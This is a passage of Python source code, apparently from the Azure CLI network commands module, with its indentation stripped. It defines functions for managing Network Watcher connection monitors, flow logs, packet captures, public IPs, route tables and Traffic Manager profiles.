connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
raise CLIError('test group: "{}" not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
# deal with test configurations which are only referenced by this remove test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
except:
raise CLIError("usage error: the format of the '--local' and '--remote' should be like x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# combination of resource_group_name and nsg is for old output
# combination of location and flow_log_name is for new output
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None, # dummy parameter to let it appear in command
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_name))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance,
signed_message=None,
authorization_message=None,
tags=None,
commissioned_state=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
if commissioned_state is not None:
instance.commissioned_state = commissioned_state[0].upper() + commissioned_state[1:] + 'ing'
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
instance.monitor_config.port = monitor_port
if monitor_path == '':
instance.monitor_config.path = None
elif monitor_path is not None:
instance.monitor_config.path = monitor_path
if interval is not None:
instance.monitor_config.interval_in_seconds = interval
if timeout is not None:
instance.monitor_config.timeout_in_seconds = timeout
if max_failures is not None:
instance.monitor_config.tolerated_number_of_failures = max_failures
if monitor_custom_headers is not None:
instance.monitor_config.custom_headers = monitor_custom_headers
if status_code_ranges is not None:
instance.monitor_config.expected_status_code_ranges = status_code_ranges
if max_return is not None:
instance.max_return = max_return
# TODO: Remove workaround after https://github.com/Azure/azure-rest-api-specs/issues/1940 fixed
for endpoint in instance.endpoints:
endpoint._validation = { # pylint: disable=protected-access
'name': {'readonly': False},
'type': {'readonly': False},
}
return instance
def create_traffic_manager_endpoint(cmd, resource_group_name, profile_name, endpoint_type, endpoint_name,
target_resource_id=None, target=None,
endpoint_status=None, weight=None, priority=None,
endpoint_location=None, endpoint_monitor_status=None,
min_child_endpoints=None, geo_mapping=None,
monitor_custom_headers=None, subnets=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Endpoint
ncf = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).endpoints
endpoint = Endpoint(target_resource_id=target_resource_id, target=target,
endpoint_status=endpoint_status, weight=weight, priority=priority,
endpoint_location=endpoint_location,
endpoint_monitor_status=endpoint_monitor_status,
min_child_endpoints=min_child_endpoints,
geo_mapping=geo_mapping,
subnets=subnets,
custom_headers=monitor_custom_headers)
return ncf.create_or_update(resource_group_name, profile_name, endpoint_type, endpoint_name,
endpoint)
def update_traffic_manager_endpoint(instance, endpoint_type=None, endpoint_location=None,
endpoint_status=None, endpoint_monitor_status=None,
priority=None, target=None, target_resource_id=None,
weight=None, min_child_endpoints=None, geo_mapping=None,
subnets=None, monitor_custom_headers=None):
if endpoint_location is not None:
instance.endpoint_location = endpoint_location
if endpoint_status is not None:
instance.endpoint_status = endpoint_status
if endpoint_monitor_status is not None:
instance.endpoint_monitor_status = endpoint_monitor_status
if priority is not None:
instance.priority = priority
if target is not None:
